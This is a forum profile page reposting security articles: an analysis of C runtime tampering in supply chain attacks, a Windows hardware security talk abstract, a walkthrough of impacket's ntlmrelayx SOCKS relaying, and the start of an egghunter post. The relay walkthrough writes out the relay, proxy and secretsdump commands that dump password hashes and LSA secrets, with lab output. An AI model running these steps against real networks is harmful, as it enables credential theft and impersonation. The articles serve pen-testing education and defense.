Everything posted by Nytro
-
Analyzing C/C++ Runtime Library Code Tampering in Software Supply Chain Attacks
Posted on: April 22, 2019, 7:30 am | Posted in: Malware | Author: Trend Micro | By Mohamad Mokbel

For the past few years, the security industry's very backbone — its key software and server components — has been the subject of numerous attacks through cybercriminals' various works of compromise and modification. Such attacks involve the original software being compromised via malicious tampering of its source code, its update server, or in some cases both. In either case, the intention is always to get into the network or a host of a targeted entity in a highly inconspicuous fashion — which is known as a supply chain attack.

Depending on the attacker's technical capabilities and stealth motivation, the methods used in the malicious modification of the compromised software vary in sophistication and astuteness. Four major methods have been observed in the wild:

1. The injection of malicious code at the source code level of the compromised software, for native or interpreted/just-in-time compilation-based languages such as C/C++, Java, and .NET.
2. The injection of malicious code inside C/C++ compiler runtime (CRT) libraries, e.g., poisoning of specific C runtime functions.
3. Other less intrusive methods, which include the compromise of the update server such that instead of deploying a benign updated version, it serves a malicious implant. This malicious implant can come from the same compromised download server or from another, completely separate server that is under the attacker's control.
4. The repackaging of legitimate software with a malicious implant. Such trojanized software is either hosted on the official yet compromised website of a software company or spread via BitTorrent or other similar hosting zones.

This blog post will explore and attempt to map multiple known supply chain attack incidents of the last decade to the four methods listed above. The focus will be on Method 2, whereby a list of all poisoned C/C++ runtime functions will be provided, each mapped to its unique malware family. Furthermore, the ShadowPad incident is taken as a test case, documenting how such poisoning happens. Methods 1 and 2 stand out from the other methods because of the nature of their operation, which is the intrusive and more subtle tampering of code — they are a category in their own right. However, Method 2 is far more insidious, since any tampering in the code is not visible to the developer or any source code parser; the malicious code is introduced at the time of compilation/linking.

Examples of attacks that used a combination of Methods 1 and 3 are:

- The trojanization of MediaGet, a BitTorrent client, via a poisoned update (mid-February 2018). The change employed involved a malicious update component and a trojanized copy of the file mediaget.exe.
- The Nyetya/MeDoc attack on M.E.Doc, accounting software by Intellect Service, which delivered the destructive ransomware Nyetya/NotPetya by manipulating its update system (April 2017). The change employed involved backdooring of the .NET module ZvitPublishedObjects.dll.
- The KingSlayer attack on EventID, which resulted in the compromise of the Windows Event Log Analyzer software's source code (service executable in .NET) and update server (March 2015).
An example of an attack that solely made use of Method 3 is the Monju incident, which involved the compromise of the update server for the media player GOM Player by GOMLab and resulted in the distribution of a variant of Gh0st RAT toward specific targets (December 2013). For Method 4, we have the Havex incidents, which involved the compromise of multiple industrial control system (ICS) websites and software installers (different dates in 2013 and 2014).

Examples of attacks that used a combination of Methods 2 and 3 are:

- Operation ShadowHammer, which involved the compromise of a computer vendor's update server to target an unknown set of users based on their network adapters' media access control (MAC) addresses (June 2018). The change employed involved a malicious update component.
- An attack on the gaming industry (Winnti.A), which involved the compromise of three gaming companies and the backdooring of their respective main executables (publicized in March 2019).
- The CCleaner case, which involved the compromise of Piriform, resulting in the backdooring of the CCleaner software (August 2017).
- The ShadowPad case, which involved the compromise of NetSarang Computer, Inc., resulting in the backdooring of all of the company's products (July 2017). The change employed involved malicious code that was injected into the library nssock2.dll, which was used by all of the company's products.

Methods 2 and 3 were also used by the Winnti group, which targeted the online video game industry, compromising multiple companies' update servers in an attempt to spread malicious implants or libraries using the AheadLib tool (2011). Another example is the XcodeGhost incident (September 2015), in which Apple's Xcode integrated development environment (IDE) and the compiler's CoreServices Mach-O object file were modified to include malware that would infect every iOS app built (via the linker) with the trojanized Xcode IDE. The trojanized version was hosted on multiple Chinese file sharing services, resulting in hundreds of trojanized apps landing on the iOS App Store unfettered.

An interesting case that shows a different side of the supply chain attack methods is the event-stream incident (November 2018). event-stream is a widely used package on npm (the Node.js package manager) for the JavaScript programming language. A package known as flatmap-stream was added as a direct dependency of the event-stream package. The original author/maintainer of the event-stream package had delegated publishing rights to another person, who then added the malicious flatmap-stream package. This malicious package targeted specific developers working on the release build scripts of the bitcoin wallet app Copay, all for the purpose of stealing bitcoins. The malicious code got written into the app when the build scripts were executed, thereby adding another layer of covertness.

In most of the supply chain attack cases of the past decade, the initial infection vector is unknown, or at least not publicly documented. Moreover, the particulars of how the malicious code gets injected into the benign software codebase are not documented either, whether from a forensics or a tactics, techniques, and procedures (TTP) standpoint. However, we will attempt to show how Method 2, which employs sophisticated tampering of code and is harder to detect, is used by attackers in a supply chain attack, using the ShadowPad case as our sample for analysis.
An In-Depth Analysis of Method 2 – Case Study: ShadowPad

There are subtle differences between tampering with the original source code, as in Method 1, and tampering with the C/C++ runtime libraries, as in Method 2. Depending on the nature and location of the changes, the former might be easier to spot, whereas the latter would be much harder to detect if no file monitoring and integrity checks were in place.

All of the reported cases where the C/C++ runtime libraries are poisoned or modified involve Windows binaries, each statically compiled with the Microsoft Visual C/C++ compiler with varying linker versions. Additionally, none of the poisoned functions are part of the actual C/C++ standard libraries; they are specific to the Microsoft Visual C/C++ compiler runtime initialization routines. Table 1 shows the list of all known malware families with their tampered runtime functions.

Malware family                       | Poisoned Microsoft Visual C/C++ runtime function
-------------------------------------+---------------------------------------------------------------
ShadowHammer                         | __crtExitProcess(UINT uExitCode)
                                     | Exits the process; checks if it is part of a managed app.
                                     | A CRT wrapper for ExitProcess.
Gaming industry (HackedApp.Winnti.A) | __scrt_common_main_seh(void)
                                     | Entry point of the C runtime library (_mainCRTStartup) with
                                     | support for structured exception handling; calls the
                                     | program's main() function.
CCleaner                             | Stage 1: __scrt_common_main_seh(void)
                                     | Stage 2, dropped (32-bit): __security_init_cookie()
                                     | Stage 2, dropped (64-bit): __security_init_cookie()
                                     | void __security_init_cookie(void) initializes the global
                                     | security cookie used for buffer overflow protection.
ShadowPad                            | _initterm(_PVFV * pfbegin, _PVFV * pfend)
                                     | Calls the entries in a function pointer table; the entry
                                     | 0x1000E600 is the malicious one.
Table 1. List of poisoned/modified Microsoft Visual CRT functions in supply chain attacks

It's the linker's responsibility to include the necessary CRT library for providing the startup code. A different CRT library could be specified via an explicit linker flag; otherwise, the default statically linked CRT library, libcmt.lib (or another), is used. The startup code performs various environment setup operations prior to executing the program's main() function. Such operations include exception handling, thread data initialization, program termination, and cookie initialization. It's important to note that the CRT implementation is compiler-, compiler option-, compiler version-, and platform-specific.

Microsoft used to ship the Visual C runtime library headers and compilation files that developers could build themselves. For example, for Visual Studio 2010, such headers would exist under "Microsoft Visual Studio 10.0\VC\crt", and the actual implementation of the ShadowPad-poisoned function _initterm() would reside inside the file crt0dat.c, as shown in the sketch below (comments omitted for readability). This internal function is responsible for walking a table of function pointers and calling each non-null entry. It's called only during the initialization of a C++ program, and the poisoned DLL nssock2.dll is written in C++. The argument pfbegin points to the first valid entry of the table, while pfend points to the end of the table. The definition of the function type _PVFV is inside the CRT file internal.h (also reproduced below). The function itself is defined in the crt0dat.c file; the object file crt0dat.obj resides inside the library file libcmt.lib. Figure 1 shows ShadowPad's implementation of _initterm().

Figure 1. ShadowPad's poisoned _initterm() runtime function
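For reference, here is a minimal reconstruction of the CRT source referenced above, based on the Visual C runtime files (internal.h and crt0dat.c) that Microsoft used to ship; treat it as a sketch, since the exact code varies by compiler version:

#include <stddef.h>  /* for NULL */

typedef void (__cdecl *_PVFV)(void);  /* internal.h: type of each table entry */

void __cdecl _initterm(_PVFV *pfbegin, _PVFV *pfend)
{
    /* crt0dat.c: walk the function pointer table, calling each non-null
       entry; a poisoned entry in this table is what hands control to the
       ShadowPad code at 0x1000E600 */
    while (pfbegin < pfend)
    {
        if (*pfbegin != NULL)
            (**pfbegin)();   /* e.g., a C++ constructor initializer */
        ++pfbegin;
    }
}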
Figure 2 shows the function pointer table for ShadowPad's _initterm() function as pointed to by pfbegin and pfend. This table is used for constructing objects at the beginning of the program, particularly for calling C++ constructors, which is what's happening in the screenshot below.

Figure 2. Function pointer table for ShadowPad's poisoned _initterm() runtime function

As shown in Figure 2, the function pointer entry labeled malicious_code at the virtual address 0x1000F6A0 has been poisoned to point to malicious code (0x1000E600). It's more accurate to say that it is the function pointer table that was poisoned rather than the function _initterm() itself.

Figure 3 shows the cross-reference graph of the _initterm() CRT function as referenced by the compiled ShadowPad code. The graph shows all call paths (reachability) that lead to it, and all other calls it makes itself. The actual call path that leads to executing the ShadowPad code is: DllEntryPoint() -> __DllMainCRTStartup() -> _CRT_INIT() -> _initterm() -> __imp_initterm() -> malicious_code() via the function pointer table.

Figure 3. Call cross-reference graph for ShadowPad's poisoned _initterm() runtime function

Note that the internal function _initterm() is called from within the CRT initialization function _CRT_INIT(), which is responsible for C++ DLL initialization and has the prototype BOOL WINAPI _CRT_INIT(HANDLE hDllHandle, DWORD dwReason, LPVOID lpReserved). One of its responsibilities is invoking the C++ constructors for the C++ code in the DLL nssock2.dll, as demonstrated earlier. The function is implemented inside the CRT file crtdll.c (object file crtdll.obj, library file msvcrt.lib); its full source is not reproduced here.

So, how could an attacker poison any of those CRT functions? It's possible to overwrite the original benign libcmt.lib/msvcrt.lib library with a malicious one, or to modify the linker flag such that it points to a malicious library file. Another possibility is hijacking the linking process: as the linker resolves all references to the various functions, the attacker's tool monitors this process, intercepts it, and feeds it a poisoned function definition instead. Backdooring the compiler's key executables, such as the linker binary itself, can be another stealthy poisoning vector.

Conclusion

Although attacks using Method 2 are very low in number, difficult to predict, and possibly targeted, when one takes place it can be likened to a black swan event: it will catch victims off guard, and its impact will be widespread and catastrophic. Tampering with CRT library functions in supply chain attacks is a real threat that requires further attention from the security community, especially when it comes to the verification and validation of the integrity of development and build environments.

Steps could be taken to ensure clean software development and build environments. Maintaining and cross-validating the integrity of the source code and of all compiler libraries and binaries are good starting points. The use of third-party libraries and code must be vetted and scanned for any malicious indicators prior to integration and deployment. Proper network segmentation is also essential for separating critical assets in the build and distribution (update server) environments from the rest of the network. Enforcing strict access, with multifactor authentication, to the release build servers and endpoints is important as well.
Of course, these steps do not release developers from the responsibility of continuously monitoring the security of their own systems.

Source: https://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks/
-
The security features of modern PC hardware are enabling new trust boundaries and attack resistance capabilities unparalleled in software alone. These hardware capabilities help to improve resistance to a wide range of attacks including physical attacks against DMA and disk encryption, kernel and remote code exploits, and even application isolation through virtualization. In this talk, we will review the metamorphosis and fundamental re-architecture of Windows to take advantage of emerging hardware security capabilities. We will also examine in-depth the hardware security features provided by vendors such as Intel, AMD, ARM and others, and explain how Windows takes advantage of these features to create new and powerful security boundaries and exploit mitigations. Finally, we will discuss the new attack surface that hardware provides and review exploit case studies, lessons learned, and mitigations for attacks that target PC hardware and firmware. Speaker Bio: David Weston is a group manager in the Windows team at Microsoft, where he currently leads the Windows Device Security and Offensive Security Research teams. David has been at Microsoft working on penetration testing, threat intelligence, platform mitigation design, and offensive security research since Windows 7. He has previously presented at security conferences such as Blackhat, CanSecWest and DefCon.
-
Playing with Relayed Credentials
June 27, 2018

During penetration testing exercises, the ability to make a victim connect to an attacker-controlled host provides an interesting approach for compromising systems. Such connections could be a consequence of tricking a victim into connecting to us (yes, we act as the attackers) by means of a phishing email, or by means of different techniques with the goal of redirecting traffic (e.g. ARP poisoning, IPv6 SLAAC, etc.). In both situations, the attacker will have a connection coming from the victim that he can play with. In particular, we will cover our implementation of an attack that uses victims' connections in a way that allows the attacker to impersonate them against a target server of his choice, assuming the underlying authentication protocol used is NT LAN Manager (NTLM).

General NTLM Relay Concepts

The oldest implementation of this type of attack, previously called SMB Relay, goes back to 2001, by Sir Dystic of Cult of the Dead Cow, who focused only on SMB connections, although he used nice tricks, especially when launching from Windows machines where some ports are locked by the kernel. I won't go into details on how this attack works, since there is a lot of literature about it (e.g. here) and an endless number of implementations (e.g. here and here). However, it is important to highlight that this attack is not related to a specific application layer protocol (e.g. SMB) but is in fact an issue with the NT LAN Manager authentication protocol (defined here). There are two flavors of this attack:

- Relaying credentials to the victim machine (a.k.a. credential reflection): in theory, fixed by Microsoft starting with MS08-068 and then extended to other protocols. There is an interesting thread here that attempts to cover this topic.
- Relaying credentials to a third-party host (a.k.a. credential relaying): still widely used, with no specific patch available, since this is basically an authentication protocol flaw. There are effective workarounds that could help against this issue (e.g. packet signing), but only if the network protocol used supports it. There were, however, some attacks against this protection as well (e.g. CVE-2015-0005).

In a nutshell, we can abstract the attack to the NTLM protocol, regardless of the underlying application layer protocol used; the original post illustrates the second flavor with a diagram (a simplified sketch of the flow appears below).

Over the years, some open source solutions extended the original SMB attack to other protocols (a.k.a. cross-protocol relaying). A few years ago, Dirk-Jan Mollema extended impacket's original smbrelayx.py implementation into a tool that could target other protocols as well. We decided to call it ntlmrelayx.py and since then, new protocols to relay against have been added: SMB/SMB2, LDAP, MS-SQL, IMAP/IMAPS, HTTP/HTTPS, and SMTP.

I won't go into details on the specific attacks that can be done, since again, there are already excellent explanations out there (e.g. here and here). Something important to mention is that the original use case for ntlmrelayx.py was basically a one-shot attack, meaning that whenever we could catch a connection, an action (or attack) would be triggered using the successfully relayed authentication data (e.g. create a user through LDAP, download a specific HTTP page, etc.). Nevertheless, amazing attacks were implemented as part of this approach (e.g. ACL privilege escalation as explained here).
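To recap the abstract flow (a rough sketch of the second flavor; the attacker simply forwards each NTLM message between the two ends and keeps the resulting session for himself):

Victim                      Attacker (relay)                 Target
  | --- NTLM NEGOTIATE ------> | --- NTLM NEGOTIATE -------> |
  | <-- NTLM CHALLENGE ------- | <-- NTLM CHALLENGE -------- |
  | --- NTLM AUTHENTICATE ---> | --- NTLM AUTHENTICATE ----> |
  |                            |   (authenticated session    |
  |                            |    as the victim's account) |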
Also, initially, most of the attacks only worked for credentials that had administrative privileges, although over time we realized there were more possible use cases targeting regular users. These two things, along with an excellent presentation at DEFCON 20, motivated me to extend the use cases into something different.

Value every session, use it, and reuse it at will

When you're attacking networks, if you can intercept a connection or attract a victim to you, you really want to take full advantage of it, regardless of the privileges of that victim's account. The higher the better, of course, but you never know the attack paths to your objectives until you test different approaches. With all this in mind, coupled with the awesome work done on ZackAttack, it was clear that there could be an extension to ntlmrelayx.py that would strive to:

- Keep the session open as long as possible once the authentication data is successfully relayed.
- Allow these sessions to be used multiple times (sometimes even concurrently).
- Relay any account, regardless of its privilege at the target system.
- Relay to any possible protocol supporting NTLM, and provide a way to easily add new ones.

Based on these assumptions, I decided to re-architect ntlmrelayx.py to support these scenarios (the original post includes a high-level diagram, not reproduced here).

We always start with a victim connecting to any of our Relay Servers, which are servers that implement support for NTLM as the authentication mechanism. At the moment we have two Relay Servers, one for HTTP/S and another for SMB (v1 and v2+), although there could be more (e.g. RPC, LDAP, etc.). These servers know little about both the victim and the target. Their most important job is to implement a specific application layer protocol (in the context of a server) and engage the victim in the NTLM authentication process. Once the victim takes the bait, the Relay Servers look for a suitable Relay Protocol Client based on the protocol we want to relay credentials to at the target machine (e.g. MSSQL).

Let's say a victim connects to our HTTP Relay Server and we want to relay his credentials to the target's MSSQL service (HTTP->MSSQL). For that to happen, there must be an MSSQL Relay Protocol Client that can establish the communication with the target and relay the credentials obtained by the Relay Server. A Relay Protocol Client plugin knows how to talk a specific protocol (e.g. MSSQL), how to engage in an NTLM authentication using relayed credentials coming from a Relay Server, and how to then keep the connection alive (more on that later). Once a relay attempt works, each instance of these Protocol Clients will hold a valid session against the target, impersonating the victim's identity. We currently support Protocol Clients for HTTP/S, IMAP/S, LDAP/S, MSSQL, SMB (v1 and 2+) and SMTP, although there could be more (e.g. POP3, Exchange WS, etc.). At this stage the workflow is twofold:

- If ntlmrelayx.py is configured to run one-shot actions, the Relay Server will search for the corresponding Protocol Attack plugin that implements the static attacks offered by the tool.
- If ntlmrelayx.py is configured with -socks, no action will be taken, and the authenticated sessions will be held active so they can later be used and reused through a SOCKS proxy.

SOCKS Server and SOCKS Relay plugins

Let's say we're running in -socks mode and we have a bunch of victims that took the bait.
In this case we should have a lot of sessions waiting to be used. Our implementation involves two main actors:

- SOCKS Server: a SOCKS 4/5 server that holds all the sessions and serves them to SOCKS clients. It also tries to keep these sessions alive even when they are not in use; to do that, a keepAlive method on every session is called from time to time. This keepalive mechanism is bound to the particular protocol connection being relayed (e.g. this is what we do for SMB).
- SOCKS Relay Plugin: when a SOCKS client connects to the SOCKS Server, there are some tricks we need to apply. Since we're holding connections that are already established (sessions), we need to trick the SOCKS client into believing that an authentication is happening when, in fact, it's not. The SOCKS server also needs to know not only the target server the SOCKS client wants to connect to but also the username, so it can verify whether there's an active session for it. If so, it needs to answer the SOCKS client back successfully (or not) and then tunnel the client through the session's connection. Finally, whenever the SOCKS client closes the session (which we don't really want to do, since we want to keep these sessions active), we need to fake those calls as well. Since all these tasks are protocol specific, we've created a plugin scheme that lets contributors add more protocols to run through SOCKS (e.g. Exchange Web Services?). We currently support tunneling connections through SOCKS for SMB, MSSQL, SMTP, IMAP/S and HTTP/S.

With all this information described, let's get into some hands-on examples.

Examples in Action

The best way to understand all of this is through examples, so let's get to playing with ntlmrelayx.py. The first thing you should do is install the latest impacket. I usually play with the dev version, but if you want to stay on the safe side, we tagged a new version a few weeks ago. Something important to keep in mind (especially for Kali users) is that you have to be sure there is no previous impacket version installed, since sometimes the new one will get installed in a different directory and the old one will still be loaded first (check this for help). Whenever you run any of the examples, always be sure that the version banner shown matches the latest version installed.

Once everything is installed, the first thing to do is to run ntlmrelayx.py specifying the targets (using the -t or -tf parameters) we want to attack. Targets are now specified in URI syntax, where:

- Scheme: specifies the protocol to target (e.g. smb, mssql, all)
- Authority: in the form of domain\username@host:port (domain\username is optional and not used - yet)
- Path: optional and only used for specific attacks (e.g. HTTP, when you need to specify a base URL)

For example, if we specify the target as mssql://10.1.2.10:6969, every time we get a victim connecting to our Relay Servers, ntlmrelayx.py will relay the authentication data to the MSSQL service (port 6969) at the target 10.1.2.10. There's a special case: all://10.1.2.10. If you specify that target, ntlmrelayx.py will expand it based on the number of Protocol Client plugins available. As of today, that target will get expanded to 'smb://', 'mssql://', 'http://', 'https://', 'imap://', 'imaps://', 'ldap://', 'ldaps://' and 'smtp://', meaning that for every victim connecting to us, each credential will be relayed to those destinations (we will need a victim's connection for each destination).
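As an illustration of this target syntax (not impacket's actual parsing code, just a standard-library sketch of how such a URI decomposes):

from urllib.parse import urlparse

# hypothetical target in the scheme://domain\username@host:port form
target = urlparse(r"mssql://CONTOSO\normaluser1@10.1.2.10:6969")
print(target.scheme)    # 'mssql' - the protocol to relay to
print(target.username)  # 'CONTOSO\normaluser1' (optional)
print(target.hostname)  # '10.1.2.10'
print(target.port)      # 6969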
Finally, after specifying the targets, all we need is to add the -socks parameter and optionally -smb2support (so the SMB Relay Server adds support for SMB2+), and we're ready to go:

# ./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] SOCKS proxy started. Listening at port 1080
[*] IMAP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>

Then, with the help of Responder, phishing emails, or other tools, we wait for victims to connect. Every time authentication data is successfully relayed, you will get a message like:

[*] Authenticating against smb://192.168.48.38 as VULNERABLE\normaluser3 SUCCEED
[*] SOCKS: Adding VULNERABLE/NORMALUSER3@192.168.48.38(445) to active SOCKS connection. Enjoy

At any moment, you can get a list of active sessions by typing socks at the ntlmrelayx.py prompt:

ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
SMTP      192.168.48.224  VULNERABLE/NORMALUSER3    25
SMTP      192.168.48.224  CONTOSO/NORMALUSER1       25
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143

As can be seen, there are multiple active sessions impersonating different users against different targets/services. These are some of the targets/services specified initially to ntlmrelayx.py using the -tf parameter. In order to use them, for some use cases we will be using proxychains as our tool to redirect applications through our SOCKS proxy. When using proxychains, be sure to configure it (the configuration file is located at /etc/proxychains.conf) to point at the host where ntlmrelayx.py is running; the SOCKS port is the default one (1080). You should have something like this in your configuration file:

[ProxyList]
socks4 192.168.48.1 1080

Let's start with the easiest example: using some SMB sessions with Samba's smbclient. The available SMB sessions are:

Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445

Let's say we want to use the CONTOSO/NORMALUSER1 session; we could do something like this:

root@kalibeto:~# proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Enter CONTOSO\normaluser1's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                          DR        0  Thu Dec  7 19:07:54 2017
  ..                         DR        0  Thu Dec  7 19:07:54 2017
  Default                   DHR        0  Tue Jul 14 03:08:44 2009
  desktop.ini               AHS      174  Tue Jul 14 00:59:33 2009
  normaluser1                 D        0  Wed Nov 29 14:14:50 2017
  Public                     DR        0  Tue Jul 14 00:59:33 2009

		5216767 blocks of size 4096. 609944 blocks available
smb: \>

A few important things here:

- You need to specify the right domain and username pair that matches the output of the socks command; otherwise, the session will not be recognized. For example, if you didn't specify the domain name in the smbclient parameters, you would get an error in ntlmrelayx.py saying: [-] SOCKS: No session for WORKGROUP/NORMALUSER1@192.168.48.230(445) available
- When you're asked for a password, just type whatever you want. As mentioned before, the SOCKS Relay Plugin that handles the connection will fake the login process and then tunnel the original connection.

Just in case, using the Administrator's session will give us a different type of access:

root@kalibeto:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Enter VULNERABLE\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                     DHS           0  Thu Dec  7 19:08:00 2017
  Documents and Settings           DHS           0  Tue Jul 14 01:08:10 2009
  pagefile.sys                     AHS  1073741824  Thu May  3 16:32:43 2018
  PerfLogs                           D           0  Mon Jul 13 23:20:08 2009
  Program Files                     DR           0  Fri Dec  1 17:16:28 2017
  Program Files (x86)               DR           0  Fri Dec  1 17:03:57 2017
  ProgramData                       DH           0  Tue Feb 27 15:02:13 2018
  Recovery                         DHS           0  Wed Sep 30 18:00:31 2015
  System Volume Information        DHS           0  Wed Jun  6 12:24:46 2018
  tmp                                D           0  Sun Mar 25 09:49:15 2018
  Users                             DR           0  Thu Dec  7 19:07:54 2017
  Windows                            D           0  Tue Feb 27 16:25:59 2018

		5216767 blocks of size 4096. 609996 blocks available
smb: \>

Now let's play with MSSQL. We have the following active sessions:

ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433

impacket comes with a tiny TDS client we can use for this connection:

root@kalibeto:# proxychains ./mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:1433-<><>-OK
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 19136)
[!] Press help for extra shell commands
SQL> select @@servername

--------------------------------------------------------------------------------------------------------------------------------
WIN7-A\SQLEXPRESS

SQL>

I've successfully tested other TDS clients as well. As always, the most important thing is to correctly specify the domain/username information. Another interesting example to see in action is using IMAP/S sessions with Thunderbird's native SOCKS proxy support.
Based on this exercise, we have the following IMAP session active:

Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143

We need to configure an account in Thunderbird for this user. A few things to keep in mind when doing so:

- It is important to specify the authentication method 'Normal Password', since that's the mechanism the IMAP/S SOCKS Relay Plugin currently supports. Keep in mind, as mentioned before, that this will be a fake authentication.
- Under Server Settings -> Advanced, you need to set the 'Maximum number of server connections to cache' to 1. This is very important; otherwise Thunderbird will try to open several connections in parallel.
- Finally, under the Network Settings, you will need to point the SOCKS proxy at the host where ntlmrelayx.py is running, port 1080.

Now we're ready to use that account. You can even subscribe to other folders as well. If you combine IMAP/S sessions with SMTP ones, you can fully impersonate the user's mailbox. The only constraint I've observed is that there's no way to keep an SMTP session alive; it will last for a fixed period of time that is configured through a group policy (the default is 10 minutes).

Finally, just in case, for those boxes we have administrative access on, we can just run secretsdump.py through proxychains and get the user's hashes:

root@kalibeto # proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
[*] DPAPI_SYSTEM
0000   01 00 00 00 1C 17 F6 05  23 2B E5 97 95 E0 E4 DF   ........#+......
0010   47 96 CC 79 1A C2 6E 14  44 A3 C1 9E 6D 7C 93 F3   G..y..n.D...m|..
0020   9A EC C6 8A 49 79 20 9D  B5 FB 26 79               ....Iy ...&y
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
[*] NL$KM
0000   EB 5C 93 44 7B 08 65 27  9A D8 36 75 09 A9 CF B3   .\.D{.e'..6u....
0010   4F AF EC DF 61 63 93 E5  20 C5 4F EF 3C 65 FD 8C   O...ac.. .O.<e..
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK

From this point on, you probably don't need to use the relayed credentials anymore.

Final Notes

Hopefully this blog post gives some hints on what the SOCKS support in ntlmrelayx.py is all about. There are many things to test, and surely a lot of bugs to solve (there are known stability issues).
But more importantly, there are still many protocols supporting NTLM that haven't been fully explored! I'd love to get your feedback, and as always, pull requests are welcome. If you have questions or comments, feel free to reach out to me at @agsolino.

Acknowledgments

Dirk-Jan Mollema (@_dirkjan), for his awesome initial job on ntlmrelayx.py and all the modules and plugins contributed over time. Martin Gallo (@MartinGalloAr), for peer reviewing this blog post.

Source: https://www.secureauth.com/blog/playing-relayed-credentials
-
Windows 10 egghunter (wow64) and more
Published April 23, 2019 | By Peter Van Eeckhoutte (corelanc0d3r)

Introduction

Ok, I have a confession to make: I have always been somewhat intrigued by egghunters. That doesn't mean that I like to use (or abuse) an egghunter just because I fancy what it does. In fact, I believe it's good practice to avoid egghunters if you can, as they tend to slow things down. What I mean is that I have been fascinated by techniques to search memory without making the process crash. It's just a personal thing; it doesn't matter too much.

